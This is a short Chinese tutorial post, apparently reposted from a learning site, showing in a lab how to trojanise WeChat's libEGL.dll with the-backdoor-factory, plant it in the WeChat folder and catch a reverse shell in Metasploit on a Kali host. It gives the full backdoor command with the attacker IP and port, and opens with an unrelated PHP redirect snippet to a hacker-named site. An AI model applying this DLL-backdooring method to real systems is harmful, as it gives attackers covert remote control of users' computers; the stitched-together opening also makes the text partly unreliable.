10.9 利用微信dll反弹shell

ε祈祈猫儿з 提交于 2019-11-30 22:09:19

  

header() 向用户的浏览器发送HTTP报头

echo”<meta charset=’UTF-8’/>”;

header(“Content-Type:text/html;charset=utf-8”);//解决编码问题

header(“location:http://www.hacker.com”);//页面跳转

 

利用微信dll反弹shell

Win7192.168.56.141

Kali192.168.56.139

打开windows7中的微信登录界面,不需要登录,再打开Process Explorer任务管理工具,招待微信所使用的dll文件

 

 

 

这里我们选择libEGL.dll文件,将其复制到kalithe-backdoor-factory目录中,

然后执行代码如下:

python backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 8888 -H 192.168.56.139

其中,-f 表示被劫持的 DLL 文件,-s 表示 shell 的类型,-P 表示 DLL 要连接 远程主机的端口,-H 表示 DLL 连接的远程主机

 

 

 

可以看到生成文件已经存放在backdoored目录下

 

 

 

然后将该文件重新放置在win7的微信安装目录下覆盖

 

之后打开kali中的msf 设置exploit payload,随后设置 lhost lportIP 192.16856.139,端口是 8888,最后输入 exploit 或者 run,监听过来的 shell

开启监听

 

 

 

之后在win7中打开微信,就能在kali中接受到反弹的shell

 

 

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!